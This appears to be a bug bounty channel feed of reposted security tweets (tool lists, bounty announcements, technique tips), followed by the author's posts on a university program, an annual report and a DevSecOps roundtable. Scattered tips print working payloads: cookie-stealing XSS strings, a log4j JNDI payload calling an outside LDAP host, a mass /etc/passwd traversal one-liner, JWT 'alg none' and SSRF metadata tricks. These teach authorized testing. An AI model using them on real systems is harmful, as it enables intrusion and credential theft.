Makrushin: Bug Hunting Hub
The source of insights for Bug Hunters. The channel is driven by a bot. Run by @makrushin
#BugBountyTips of the Day
Yay, I was awarded 200$ bounty on @Bugcrowd This one is my first bounty ever. It will motivate me a lot for my future journey. And special thanks to @EmptyMahbob for always your support and @GodfatherOrwa for always sharing some unique tips. #bugbounty #TogetherWeHitHarder https://t.co/BNIXCsVpIt
---
Pro tip for #bugbounty: Go over all URLs to test at least three times, preferably on separate days. On the first pass, I find the most stuff. On the 2nd pass, I find most issues I missed. On the 3rd pass, I barely find anything at all but still have usually missed a few. 😜🥳
---
CVE-2022-32275 😶 #BugBounty https://t.co/h9MO9vKLro
---
For Beginners https://t.co/kUzws8Mxz1 #bugbountytips #infosec #cybersecurity
---
Today somehow popped a shell on the main application of a major cryptocurrency exchange. The impact is as devastating as the Web3 bugs you could have seen recently on other programs. The report was sent to their security team. Web2 bugs are alive. #bugbounty https://t.co/DrN23ItZxT
#BugBountyTips of the Day
CRLF Suite - Automated Injection Toolkit (very fast) - Repo: https://t.co/vgRW4llTwz - Creator: Nefcore Security - #CyberSecurity #bugbountytips #CTF #infosec https://t.co/mqNC5dWvp8
---
Subdomain Enumeration Automation Script ⚙️ #bugbountytips https://t.co/4qEU0OyvGY
---
New Write-up on InfoSec Write-ups publication : "Detecting DNS Tunneling using Spark Structured Streaming" #bugbounty #bugbountywriteup #bugbountytips https://t.co/rJoYv2EBba
---
Yay, I was awarded a $1,000 bounty on @Hacker0x01 for Exposed Secrets! https://t.co/JJsoq3ZO3t #bugbountytips #BugBounty #TogetherWeHitHarder https://t.co/7cT0ddkWSv
---
A little ahead of schedule, the new video on my 2-week experience (#bugbounty hunting part-time) with the Pinterest program is live. Hopefully there are some pearls of information that help others out. This was almost entirely manual testing! https://t.co/BJTZJCY7hp
---
Improve your bug hunting 1. Go to @intigriti bug-byte 2. Every bug-byte blog post contains tools section 3. There are bug-byte blogs. 4. Spend time and learn about tools #bugbountytips #bugbounty @ADITYASHENDE17
---
Aki's beta version is live now🔥 Let your web3 voices be heard! Leave your comments below 👇👇 and win the 💰💰💰 #bugbountytips #BugBounty #Pentesting https://t.co/C8M6hamfCX
---
I earned $3,600 for my submission on @bugcrowd https://t.co/adNqMtZ00S #ItTakesACrowd It was a DOM based XSS escalated to a one-click Account Takeover, at one of the oldest public programs of Bugcrowd. #cybersecurity #bugbounty #infosec #hacking #informationsecurity #hackerone https://t.co/d1Rzqadesg
---
Python Debugging Cheat Sheet #MachineLearning #python #IoT #100DaysOfCode #programming #CodeNewbie #reactjs #bugbounty #DataScience #gamedev #BigData #Analytics #NeuralNetworks #Cloud #OpenSource #AI #5G #DEVCommunity #codinglife #Automation #FutureOfWork #RPA @SourabhSKatoch https://t.co/tzeEtf8ZOq
---
API Bug-Bounty Tools Check list (Part - 1) -> Postman (It is like Burpsuite for API) -> APISec -> AppKnox -> Synopsis API Scanner -> Data Theorem API Secure #cybersecuritytips #bugbountytips #bugbounty #TweetOfTheDay #CyberSecurity #100daysofbugbounty #offensivesecurity #Defcon
#BugBountyTips of the Day
A simple and an easy finding on @Hacker0x01 While fuzzing, server-status endpoint was forbidden (403) Just added this header in request : X-Forwarded-For: 127.0.0.1 and I was able to bypass the forbidden (403) url or page. @ADITYASHENDE17 #bugbounty #togetherwehitharder https://t.co/Ut6PGmFTky
---
New web #pentesting video is live on the methodology of testing File Upload dialogues which can lead to stored HTML injection, XSS, XXE, SSRF, and RCE. The goal is to bypass or trick the content "restrictions". #bugbountytips #infosec #bugbounty https://t.co/vSZ1Beg4JV
---
Always wanted this "Hacking Hackers" badge. Finally got it !! @Hacker0x01 Now Next goal is to participate in Live Hacking Events, hopefully I get a chance this year :) #TogetherWeHitHarder #bugbounty #cybersecurity https://t.co/aaY5IdLyhW
---
Yay, I was awarded $200 bounty on @Hacker0x01 @ADITYASHENDE17 #bugbounty #togetherwehitharder https://t.co/l9zE6zwKr2
---
CVE-2022-1388: F5 BIG-IP 🔥 #infosec #bugbounty https://t.co/UbXXvL9j9L
#BugBountyTips of the Day
Ever noticed WebSocket requests while intercepting traffic in Burp Suite🤔 This thread🧵is for you if you don't know what it is and how it works! We're going to cover a short brief on Websockets in this thread🚀 (1/n) #bugbounties #bugbountytips #wapt #websockets
---
[BugBounty] Tips to Find Stored XSS - @bigb0ss___ https://t.co/5RMrt2ev1g #InfoSec #CyberSecurity #Security #BugBounty #XSS
---
Learn Account Takeover With CSRF - My First Bug on @BugBountyHunt3r with methodology by @zseano and @theXSSrat https://t.co/SqSu4ocvqr #myfirstbug #BugBounty #bugbountytips #hackers https://t.co/nKEOaCdNtm
---
> Quickly discover your target site's open ports with multiple search engines. uncover -q " https://t.co/PZPWw6V9QW" -e censys,fofa,shodan > Tool: https://t.co/QA0XoW2USI #bugbounty #bugbountytips #networkscan #penetrationtesting https://t.co/ILcewOSVM9
#BugBountyTips of the Day
Want to quickly find publicly exposed MySql backup files? Try this 👇 Credits: @_bughunter #recontips #AttackSurface #bugbountytips #mysql #reconone https://t.co/n1HrXC5yRT
---
#bugbountytips #bugbounty I just published 0 Day Vulnerability — URI Normalization Issue — Access the Internal Tomcat Server #Apache https://t.co/p1fIxzDHFz https://t.co/NbN27UTfg6
---
Best ever Tools 🔧 for Bug Bounty Hunters... →Amass →Sublister →Gauplus →HTTPX →Gf tool →Kxss →Sqlmap →Commix →Tplmap →HYDRA →John the ripper →Burpsuite →Arjun →Paramspider →NoSQLmap →NMAP →Nikto →FFUF →403-Bypass →Gobuster #bugbounty #cybersecurity
---
Best of Nmap Cheat Sheet Credit: @mohamedmaly #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity https://t.co/hRLvLse6fY
---
Found a self-XSS? 🤨 Don't worry! Let's magically turn that into a valid XSS by sprinkling some CSRF on top of it! 🧙‍♂️ #bugbounty #bugbountytips 👇 https://t.co/wbV6Sa1UEB
---
Linux Path Cheat Sheet :- #infosec #CyberSecurity #Hacking #cyber #infosecurity #Pentesting #nmap #cyberattack #Linux #AWS #opensource #security #MachineLearning #DataScience #DataAnalytics #bugbounty https://t.co/3Bdvgdzaex
---
Bug: Race condition attack [Medium] Tip: 1. Capture request on adding link/follow user's 2. Send to Turbo Intruder >> Attack with https://t.co/GHu42ZBab8 code 3. Numerous key links generated / Follower's no. increased #bugbounty #bugbountytips #hackerone https://t.co/dvfqAXv77z
---
Hello all! I released a new write up about bug bounty. Click below link to read it and enjoy! https://t.co/c5zyrkckua #bugbounty #bugbountytips @Hacker0x01 @Bugcrowd
#BugBountyTips of the Day
Admin Panel Finder - A burp suite extension that enumerates infrastructure and application admin interfaces https://t.co/ziAH4ydnbl #cybersecurity #bugbountytips #infosec https://t.co/3FaUWDomx9
---
reconFTW v2.3.1 is out with - Added ripgen @resync_gg @d0nutptr as option for permutations - Added dsieve @trick3st - Replaced nrich with smap @s0md3v - Get fresh resolvers before resolution - Added timeout option to gotator https://t.co/p3ENLkUAev #bugbounty #recon #hacking https://t.co/IcEQWnqW4H
---
Lets find some criticals at scale 🔥🔥🔥 cat hosts | httpx -nc -t 300 -p 80,443,8080,8443,8888,8088 -path "/jobmanager/logs/..%252f..%252f..%252f......%252f..%252fetc%252fpasswd" -mr "root:x" -silent https://t.co/iVfwQiPFSy #bugbountytips #bugbountytip #bugbounty
---
Bug Bounty Free Learning Materials Follow this thread if you can’t google and learn things😅 #bugbounty #bugbountytip #bugbountytips
---
Github dorks Bug hunting for beginners #Tips #bugbounty #github #Linux #programming https://t.co/JvsDHXOozT
---
#Giveaway I'm giving away either a @PentesterLab pro Voucher or @hackthebox_eu VIP+ Voucher (winner's choice). Like and retweet this for a chance to win. Follow for more giveaways this week. Feeling generous while the wife and I are recovering from surgeries #bugbounty #redteam
#BugBountyTips of the Day
During @Hacker0x01 Ambassador Worldcup We (me, @rotembar and @realgam3) found DOM Based XSS that affected 6.5m+ Elementor websites, leading to 1 click WordPress panel takeover. Full writeup on Rotem's blog -> https://t.co/AfMwENptlt #BugBounty #BugBountyTips
---
When a random stranger I gifted my #bugbounty course to comes back a couple of months later to pay back.. I'm humbly proud. Keep shining 🌟 https://t.co/p5G0vhDko6 https://t.co/nPazn55ean
---
Ways to bypass JSON Web Token controls: Tip1 ▶️The header part: { "alg" : "HS256", "typ" : "JWT" } ▶️Bypass::> Simply tamper with the algorithm type: { "alg" : "none", "typ" : "JWT" } { "user" : "admin" } #bugbountytips #infosec #infosecurity #appsec
---
#Learnwithxssmice Top Burp Suite Extensions For Improving Bug Bounty 1. AUTHMATRIX 2. AUTHZ 3. AUTHORIZE 4. BLACKSLASH POWERED SCANNER 5. COLLABORATOR EVERYWHERE @theXSSrat @ADITYASHENDE17 @Agarri_FR @ghostlulz1337 @j33n1k4 @rbhichher #bugbounty #pentest Thread Continues
---
Best ever Tools 🔧 for Bug Bounty Hunters... via@Lohitaksh @ADITYASHENDE17 @Assass1nmarcos @Alra3ees #infosec #bugbounty #bugbountytips #xss https://t.co/bzGXfuie0g
---
Top story: @kakarstoreshop: 'Skills of #sciencetwitter #Cloud #MachineLearning #python #IoT #100DaysOfCode #programming #CodeNewbie #reactjs #bugbounty #DataScience #gamedev #BigData #Analytics #NeuralNetworks #Comput https://t.co/kdy3APvGoI, see more https://t.co/CYJi5BLBS8
---
How to find SQL Injection at scale? Try this 👇 #recontips #AttackSurface #bugbountytips #reconone #BugBounty #sqlmap https://t.co/Ickwvh0Cz9
---
Digital Forensics and Incident Response Cheat Sheet Credit: @sansforensics #infosec #cybersecurity #pentesting #oscp #informationsecurity #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity #cybersecurityawareness https://t.co/Wa0QJdMspq
---
#bugbountytip So many bug hunters use RXSS scanners on WayBack data blindly. But All Wayback data response MIME type is not HTML, right? Filter out HTML MIME type and run your scanner or look for reflected param then XSS manually. This is how you will save a lot of time :) https://t.co/f4otFkpJ3v
#BugBountyTips of the Day
2FA Bypass Testing ( Method 12 ) ==> #WayToInject => Try To Use SOAP Endpoint To Bypass 2FA. #CipherEra #VedixEra #AlphaEraX #bugbounty #bugbountytips #redteam #offensivesecurity #cybersecuritytips #cybersecurity https://t.co/cMCiLKm0tg
---
$5000 bounty Today is different, I’m the GOAT of this game #bugbounty @Bugcrowd https://t.co/2dgbsqs9d5
---
MSRC took over 4 months to fix the root cause, and awarded this issue a $60,000 #BugBounty. So… What were the key mistakes? (9/11)
---
Normal Localhost for most server lives at 127.0.0.1 but if you find AWS Ec2 Instance and want to try #SSRF then try 169.254.169.254 because this is AWS Localhost. Normal Server: 127.0.0.1 AWS EC2 Instance:169.254.169.254 #bugbountytips #aws #cybersecurity
---
I create a custom nuclei template for mass hunting recent CVE-2022-29455(XSS) #bugbounty #nuclei https://t.co/uMC9ldy3CJ
#BugBountyTips of the Day
Yay, I was awarded a $1,300 bounty on @Hacker0x01! , for missing rate limit at login page 🥳 #bugbountytips #BugBounty #hackers #hackerone https://t.co/573zhTBDV8 #TogetherWeHitHarder https://t.co/BgsjJAU85h
---
Ways to bypass JSON Web Token controls: Tip2 ▶️KID manipulation: { "alg" : "HS256", "typ" : "JWT", "kid" : "1" } If the field is controlled by the user, it can be manipulated by attackers to lead to: ▶️Directory traversal: "kid": "../../etc/groups" #bugbountytips #infosecurity
---
Bug: RXSS #xss #bugbounty payload: %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E payload: %22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E https://t.co/fwXZQOWKCT
---
New video on the #bugbounty hunting process that helped me go from $0 to $150,000/mo on #bugcrowd! I believe if you follow these (5) steps it will help those struggling to find valid #cybersecurity bugs. I focus on #hacking #infosecurity. ❤️☝️ https://t.co/SaEvg28Sen
---
Basic Linux Commands Credit: @securitygull #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity #cybersecurityawareness https://t.co/syaZrv5lxs
---
A quick SSRF Bypass Explanation: Type in http://2130706433 instead of http://127.0.0.1, it would still be understood! Replace: 127.0.0.1 with 2130706433 Explanation Continued in Thread👇 #bugbountytips #ssrf #infosec #bughunting
---
Hi community! YokaiSwap Godwoken V1.1 testnet online now👹⚡️ Let's go test and find the bug🐞! 💫Together we create a secure environment for everyone💫 🧐Details: https://t.co/CcdLaOOsHF #bugbounty #Godwoken $YOK
#BugBountyTips of the Day
Here is a writeup about a vulnerability and bypass i found in Meta's bug bounty program worth 10K USD. #bugbounty #facebookwhitehat https://t.co/rZsjL46cAR
---
Just published new writeup, you can find it here: #bugbounty #bugbountytips #CVE https://t.co/OeBRRYIxf6
---
Do you want to focus on "Interesting" subdomains only? Try this 👇 #recontips #bugbountytips #recon #AttackSurface #subdomains #reconone https://t.co/si7881nCAS
---
Start reading security articles/write ups of topic you don’t know , you will never get 95% of what the article is explaining but the other 5% stays in your mind and help you later when you are on the edge of exploiting p1 bug. Try it, this works. #infosec #bugbountytips #advice
---
How to approach a BUG HUNTING TARGET? (Fast and Furious Technique) #bugbountytips #spinthehack #infosec https://t.co/tpoBO1Jkyu
---
API Bug-Bounty Tools Checklist (Part-2) -> Astra -> crAPI -> Curity Identity Server (Community Edition) -> JWT_io -> OAuth Tools -> HAWK Authentication #bugbounty #bugbountytip #cybersecurity #cybersecuritytips #TweetOfTheDay #offensivesecurity #100daysofbugbounty #DEFCON30
#BugBountyTips of the Day
Wanna find bugs before anyone else? #bugbountytip #bugbounty 1. Let's say you have scope.txt 2. You run your tools to find domains and save them to subs.txt Every day when you go to sleep run cat scope.txt | domain tools | anew subs.txt | tee -a newly-appear-doman.txt 1/2
---
Scavenger - Burp extension to create target-specific and tailored wordlist from burp history. » https://t.co/FEdtP1fCWh #cybersecurity #infosec #bugbountytips https://t.co/lZ3tUW8FUY
#BugBountyTips of the Day
🧨 Windows RPC Critical Vulnerability (CVE-2022-26809) You can search for vulnerable hosts in Shodan by dorks: port:445 product:"Microsoft RPC Endpoint Mapper" Link to PoC https://t.co/AXQC2W0rmU #bugbountytips #CVE #cybersecurity #infosec #bugbounty https://t.co/r7uf5eWgji
---
(WEF - 802.11 Offensive Framework To Automate Attacks for WPA, WEP, Hash Cracking, Bluetooth Hacking & More) - https://t.co/dwhlbrYK9H #infosec #netsec #pentest #cybersecurity #bugbounty https://t.co/nlSnMICPaf
---
New RCE log4j with @GodfatherOrwa Payload : ${jndi:ldap://${Command}XXXX${::-.} https://t.co/CSf4toAzvx}zzzz Command sys:os.arch & sys:os.version & hostName #bugbountytips #bugbountytip #bugbounty
---
toxssin☣️A POST-XSS exploitation tool. » https://t.co/MnYBAafnon #cybersecurity #bugbounty #infosec #bugbountytips #xss https://t.co/MFUCvuQq2X
---
16 Search Engines for Pentester and Security Professionals 👇💣 Credits: @NandanLohitaksh #searchengine #attacksurface #recontips #bugbountytips #reconone https://t.co/A6tUqpT9VH
---
Found a Method by which I Got Some Database Credentials leaks Recently "Quick Tips" Or "writeups" #bugbounty #cybersecurity #Hackingtime https://t.co/atRsBJY7z0
---
Hello #BugBounty community, this is my first writeup about account take over hope you like #infosecurity #bugbountytips https://t.co/O5hUBbuSah
---
Today it's been 4 years working on @Bugcrowd . I have so many great memories with @Bugcrowd, I remember my first bounty there, The first time I could change my Laptop, and remember when I could spend my summer in a new country, remember when I bought my first car. #BugBounty
---
Nmap reconnaissance for the win 🔥🔥🔥 nmap --script default,safe,discovery -p 80,443,8080,8443,9000,9001,9002,9003,8888,8088,8880,3000 -n -T4 -iL hosts.txt -oN output #bugbountytips #bugbountytip #bugbounty
#BugBountyTips of the Day
New Write-up on InfoSec Write-ups publication : "LDAP in Active Directory" #bugbounty #bugbountywriteup #bugbountytips https://t.co/Al8MbrognT
---
Tips Rxss : --><svg onload=alert(document.domain)> #bugbountytips https://t.co/VxseOgZE3u
---
If your repeater tab is not like this then you are doing something wrong x) #Burpsuite #Bugbounty https://t.co/kbQtmiRXlH
#BugBountyTips of the Day
Hacking Checklist - - #infosec #CyberSecurity #bugbountytips #CTF https://t.co/uxfEjnFTtj
---
I earned $800 for my submission on @bugcrowd #ItTakesACrowd Tips: 1) Used Gau To Get All The URLS 2) Used grep = Filtered Only URLS with Parameter 3) Used KXSS Got Reflection Allowing " < > ' 5) Tested XSS 6) Boom! #bugbounty #bugbountytip https://t.co/TsuhIftgbL
---
I earned $1800 for my submission on @bugcrowd #ItTakesACrowd #BugBounty https://t.co/98B2qRLWuL
---
Url redirection bypass I will try... #bugbounty https://x. site. com/bing.com (404) https://x. site. com///bing.com/? (404 not found) finally--> https://x. site. com/bing.com/?q (success):) #urlredirection
---
#bugbountytips #bugbounty I just published Java Application -Server Side Template Injection #Java #RCE More.. https://t.co/3ieYPIFHxn https://t.co/OOQKNQQCSW
---
This is my quick nmap setup, to scan critical ports at fast rate 💪🏻🔥 #portscan #attacksurface #recontips #bugbountytips #recon #nmap https://t.co/M9VRPLFFdr
---
New Write-up on InfoSec Write-ups publication : "Google Dorks: An Advanced Hacking Tool" #bugbounty #bugbountywriteup #bugbountytips https://t.co/eQJkI4zMH5
---
Mass assignment vulnerability in 1 step: ▶️ Intercept the request while logging in: { "name":"test","email":"test@abc.com","password":"testing" } ▶️Modify the above request like: { "name":"test","email":"test@abc.com","password":"testing","isAdmin":true } #bugbounty #infosec
---
[story of September 2021] #bugbounty #bugbountytip This is how I found 40 open redirection in 2 weeks. Bugcrowd accept open redirect as P4🧵 1. I collected all *,main domains 2. Used passive subdomain finding tools to find domains 1/n
---
(1/2) A tool for collecting subdomains and searching for vulnerabilities https://t.co/EUcGAF7CYf #cybersecurity #bugbounty #bugbountytips #infosec #web #xss #garud #sql
In the days of major cybersecurity conferences, here's a small contribution. The rare vintage photo: two guys with jetlag discussing the threat landscape of Smart City systems, having discovered a vulnerability in Las Vegas mall navigation system 40 minutes before their talk.
You discovered a critical vulnerability that will completely change the threat landscape. You disclosed it to the vendor, but the vendor declined to fix it.

“What's next?” - that’s the question.
Add even more value to the information and cyber security education program. Integrate the hands-on experience required in production into the traditional training system. Address qualified staff shortages while maintaining the fundamental requirements of educational standards.

In 2020, the three objectives were defined. In December 2022, with partner companies, we launched the postgraduate program at my alma mater - National Research Nuclear University MEPhI. In the Academic Director role, I'm proud to integrate the worlds of industry and academia.

@makrushin
report_v.2023.4: release candidate

Sit next to me. Let's discuss and prepare our annual report. Highlight the ones that made you feel the most, not just list the results. Let's do it in “parameter: value” format.

Capital: 160 researchers and developers have joined our team. All of them lead our company at the cutting edge of technology.

Managed Services: Security Operations Center rebuilt and released, 3 new services launched (Managed VPN, Anti-DDoS, Security Awareness).

Products: ASOC secure development platform released and pilot of Cloud & Container Security platform successfully completed.

Key research project: Advanced Research Team (ART), discovered vulnerability in Windows OS and GitHub repository takeover issues.

Sharing: "Career Pathways in Information Security" course prepared for MEPhI students. 4 lectures published in "open source". Let it engage anyone who has decided to dig deeper into information security.

Key insight: discovered the theory of inventive problem solving (TIPS or TRIZ) in the context of management decision making.

Key result: we got to know each other.

Happy New Year!

@makrushin
DevOpsConf 2024: Secure SDL in Fintech

Secure software development lifecycle (SSDL) is an increasingly important part of the technology landscape of organisations. The FinDevSecOps community was created in 2023 on the platform of the FinTech Association, with the support of Moscow Exchange, to unite the efforts of financial market participants and open source communities in the direction of application security.

At the DevOpsConf 2024 roundtable, we will discuss the current challenges of SSDL and collaboration between key stakeholders in the financial industry:

1. TTM and AppSec: Does implementing DevSecOps processes and tools increase cycle time? How to balance business and security needs?

2. InfoSec vs. IT or together with IT? What's the security strategy in a financial organisation?

3. What is the difference between SSDL in fintech and SSDL in non-financial companies?

@makrushin